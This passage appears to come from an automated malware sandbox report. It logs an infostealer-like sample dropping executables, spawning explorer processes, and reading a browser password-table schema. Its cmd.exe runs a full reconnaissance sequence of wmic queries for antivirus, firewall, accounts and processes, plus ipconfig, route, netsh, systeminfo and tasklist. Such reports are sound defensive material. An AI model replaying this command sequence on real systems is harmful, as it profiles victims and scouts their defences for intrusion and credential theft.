                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: aYX9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: VD[E9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: =KnH9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: &mm9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: R`9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: F:9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: 0.txt9_2_00431540
                Source: C:\Users\user\AppData\Roaming\uievsidCommand line argument: poC9_2_00436EC0
                Source: veEGy9FijY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;324&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;408&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;484&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;492&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;552&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;620&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;628&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;988&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;988&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;364&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;364&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;356&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;696&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;696&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;592&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;592&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1044&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1044&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1084&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1084&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1176&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1176&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1200&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1200&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1252&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1252&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1296&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1296&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1316&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1316&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1408&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1408&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1476&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1476&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1488&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1488&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1496&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1552&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1552&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1572&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1572&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1652&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1724&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1724&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1824&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1824&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1840&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1840&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1940&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1940&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1948&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1948&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1956&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1956&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2036&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2036&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1932&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1932&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2064&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2064&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2152&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2216&quot;::GetOwner
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;2216&quot;::GetOwner
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: WMIC.exe, 0000001B.00000003.3192985137.000001A4FD3A8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000002.3196606356.000001A4FD3B6000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001B.00000003.3193165799.000001A4FD3B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Name, Location, Command FROM Win32_StartupCommand;
                Source: 9E1F.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: veEGy9FijY.exeReversingLabs: Detection: 34%
                Source: veEGy9FijY.exeVirustotal: Detection: 37%
                Source: unknownProcess created: C:\Users\user\Desktop\veEGy9FijY.exe "C:\Users\user\Desktop\veEGy9FijY.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\haevsid C:\Users\user\AppData\Roaming\haevsid
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\38E5.exe C:\Users\user\AppData\Local\Temp\38E5.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uievsid C:\Users\user\AppData\Roaming\uievsid
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BC8F.exe C:\Users\user\AppData\Local\Temp\BC8F.exe
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeProcess created: C:\Windows\System32\cmd.exe cmd
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uievsid C:\Users\user\AppData\Roaming\uievsid
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\haevsid C:\Users\user\AppData\Roaming\haevsid
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\38E5.exe C:\Users\user\AppData\Local\Temp\38E5.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BC8F.exe C:\Users\user\AppData\Local\Temp\BC8F.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\veEGy9FijY.exeSection loaded: msvcr100.dllJump to behavior
